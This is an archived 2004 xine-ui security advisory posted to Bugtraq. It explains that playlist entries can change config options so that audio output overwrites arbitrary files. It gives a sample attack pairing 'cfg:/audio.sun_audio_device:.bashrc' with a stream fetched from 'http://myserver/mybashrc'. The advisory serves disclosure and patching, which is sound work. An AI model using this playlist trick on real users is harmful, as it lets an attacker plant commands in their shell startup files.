lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200404151446.27357.mroi@users.sourceforge.net>
Date: Thu, 15 Apr 2004 14:46:17 +0200
From: Michael Roitzsch <mroi@...rs.sourceforge.net>
To: bugtraq@...urityfocus.com
Cc: xine-announce@...ts.sourceforge.net
Subject: xine security announcement XSA-2004-2

xine security announcement
==========================

Announcement-ID: XSA-2004-2

Summary:
By opening a malicious playlist in the xine-ui media player, an attacker can 
write arbitrary content to an arbitrary file, only restricted by the 
permissions of the user running xine-ui.

Description:
xine-ui offers the feature of embedding special items in playlists that will 
apply changes to xine configuration options once the playlist item is played. 
But some of xine's configuration options specify files that will be written 
to during playback. One example of such an option is 
"audio.sun_audio_device", which specifies the audio device on SUN machines. 
The decoded PCM samples of the audio stream will be written to this file. By 
having a user open a playlist with an entry 
"cfg:/audio.sun_audio_device:.bashrc" followed by an entry 
"http://myserver/mybashrc" in xine-ui, the value of the 
"audio.sun_audio_device" option will be changed and the next entry will play 
a specially crafted audio stream. This way an attacker could fill any file 
the user has access to with arbitrary content. Other configuration options 
that allow such an attack exist (we also found "dxr3.devicename"), so the 
vulnerability is not limited to SUN machines.

Severity:
Expoits have not been seen in the public and not all xine setups use the 
vulnerable configuration options. But at least xine users on SUN machines and 
users of a DXR3 or Hollywood+ MPEG decoder card are vulnerable. Other such 
problematic configuration options might have slipped through the review or 
might be provided by xine plugins outside the main xine distribution, leaving 
other users vulnerable as well. Given the wide range of possible harm, we 
consider this problem to be highly critical.

Affected versions:
All releases starting with 0.9.21 up to and including 0.9.23.

Unaffected versions:
All releases older than 0.9.21.
CVS HEAD has been fixed.
The upcoming 0.99.1 release.

Solution:
Changes to xine configuration options via playlist are now disabled by 
default.
The attached patch to xine-ui fixes the problem but should only be used by 
distributors who do not want to upgrade. Otherwise, we strongly advise 
everyone to upgrade to CVS HEAD or to the next version of xine-ui, which is 
to be released soon.

For further information and in case of questions, please contact the xine 
team. Our website is http://xinehq.de/

Michael Roitzsch

View attachment "xine-ui-implicit-config.patch" of type "text/x-diff" (1821 bytes)

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ